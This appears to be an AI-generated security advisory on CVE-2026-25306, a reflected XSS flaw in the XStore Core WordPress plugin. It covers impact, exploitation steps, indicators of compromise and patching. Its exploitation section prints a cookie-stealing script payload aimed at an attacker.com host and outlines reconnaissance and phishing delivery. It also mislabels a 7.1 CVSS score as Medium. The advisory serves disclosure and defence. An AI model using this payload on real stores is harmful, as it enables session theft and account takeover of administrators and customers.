CVE-2026-25306
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-25306 is a Reflected Cross-Site Scripting (XSS) vulnerability in the 8theme XStore Core WordPress plugin (et-core-plugin). It affects all versions up to and including 5.6.4, and was discovered by João Pedro S Alcântara (Kinorth) on December 20, 2025, with public disclosure on March 17–25, 2026. The vulnerability carries a CVSS v3.1 base score of 7.1 (Medium) (Patchstack, Feedly).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). It is a reflected XSS flaw, meaning user-supplied input is incorporated into HTTP responses without adequate sanitization or encoding, allowing malicious scripts to be reflected back to the victim's browser. Exploitation requires no authentication (unauthenticated attacker) but does require user interaction — specifically, a victim must click a crafted malicious link or visit a specially crafted URL. The vulnerability was assigned OWASP Top 10 category A3: Injection (Patchstack).

Impact

Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the browser context of a victim who clicks a malicious link, potentially leading to session token theft, credential harvesting, account takeover of store administrators or customers, and redirection to malicious sites. Because the XStore Core plugin is associated with WooCommerce-based e-commerce stores, exploitation could expose sensitive customer and payment-related session data. The scope is changed (S:C), meaning the injected script can affect resources beyond the vulnerable component itself (Patchstack, Feedly).

Exploitability

Patchstack notes this vulnerability is "known to be exploited" and flags it as likely to be used in mass-exploit campaigns targeting thousands of WordPress sites regardless of traffic size or popularity. No authentication is required to craft a malicious URL, lowering the barrier for exploitation significantly. The EPSS score is approximately 0.033% (0.000330), indicating a relatively low but non-zero probability of exploitation in the near term. No specific threat actor attribution or public exploit kit integration has been reported at this time (Patchstack, Feedly).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the XStore Core plugin (et-core-plugin) version 5.6.4 or earlier using tools like WPScan, Shodan, or Google dorks targeting XStore-themed WooCommerce stores.
  2. Identify vulnerable parameter: Locate the specific URL parameter(s) within the XStore Core plugin that reflect unsanitized user input back in the HTTP response (e.g., via manual testing or reviewing public plugin source code).
  3. Craft malicious URL: Construct a URL containing a reflected XSS payload in the vulnerable parameter, such as https://victim-site.com/vulnerable-page/?param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Deliver the payload: Send the crafted URL to a target victim (e.g., a store administrator or logged-in customer) via phishing email, social engineering, or by embedding it in a forum post or comment.
  5. Harvest credentials/session tokens: When the victim clicks the link and their browser executes the injected script, the attacker receives the victim's session cookies or credentials at the attacker-controlled server, enabling account takeover (Patchstack).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to attacker-controlled domains carrying cookie or session data in URL parameters (e.g., ?c=<session_token>); unusual referrer headers in web server logs pointing to crafted URLs with encoded script tags.
  • Logs: WordPress or web server access logs showing requests to XStore Core plugin endpoints with URL-encoded XSS payloads (e.g., %3Cscript%3E, %3C%2Fscript%3E, javascript:) in query string parameters.
  • File System: No direct file system artifacts expected for reflected XSS; however, if exploitation leads to admin compromise, watch for newly created or modified PHP files, unauthorized plugin installations, or changes to theme files.
  • Process/Behavior: Unexpected admin-level actions in WordPress audit logs (e.g., new admin user creation, plugin installs, settings changes) following a period of suspicious URL activity (Patchstack).

Mitigation and workarounds

The vendor (8theme) has released version 5.6.5 of the XStore Core plugin, which patches this vulnerability. All users should update to version 5.6.5 or later immediately via the WordPress plugin dashboard. As an interim measure, Patchstack has issued a virtual patch (mitigation rule) for its subscribers that blocks exploitation attempts until the plugin is updated. If updating is not immediately possible, site owners should consult their hosting provider or web developer for assistance (Patchstack).

Community reactions

The vulnerability was reported through Patchstack's Active Vulnerability Disclosure Program (VDP) and credited to researcher João Pedro S Alcântara (Kinorth). Patchstack classified it as medium priority but flagged it as known to be exploited and likely to be used in mass-exploit campaigns. A social media post referencing the CVE appeared on Bluesky shortly after disclosure, indicating some community awareness (Feedly, Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-77115HIGH7.1
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-77116MEDIUM4.3
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-14853MEDIUM4.3
  • woocommerce-bookings
NoYesAug 23, 2026
CVE-2026-77003LOW2.7
  • content-mask
NoYesAug 23, 2026
CVE-2026-13598NONEN/A
  • restrictmate
NoYesAug 23, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management